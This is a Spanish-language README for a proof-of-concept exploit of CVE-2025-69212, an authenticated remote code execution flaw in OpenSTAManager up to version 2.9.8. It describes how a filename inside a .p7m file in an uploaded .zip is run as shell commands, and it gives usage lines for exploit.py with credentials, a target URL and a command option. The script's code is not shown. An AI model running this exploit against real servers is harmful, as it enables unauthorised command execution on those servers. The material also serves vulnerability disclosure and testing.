
CVE-2025-69212 Prueba de concepto.
OpenSTAManager es una solución de software de gestión para asistencia técnica, facturación electrónica y contabilidad. Las versiones <=2.9.8 son vulnerables a una vulnerabilidad de ejecución remota de código autenticada. Un atacante puede explotar este problema cargando un archivo .zip especialmente manipulado que contiene un archivo .p7m cuyo nombre de archivo puede ser interpretado como comandos de shell, lo que resulta en la ejecución arbitraria de comandos en el servidor remoto.
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
Ejemplo:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help muestra este mensaje de ayuda y sale
--user USER nombre de usuario para autenticación
--password PASSWORD contraseña para autenticación
--target TARGET endpoint del dominio objetivo
--cmd CMD comando a ejecutar en el servidor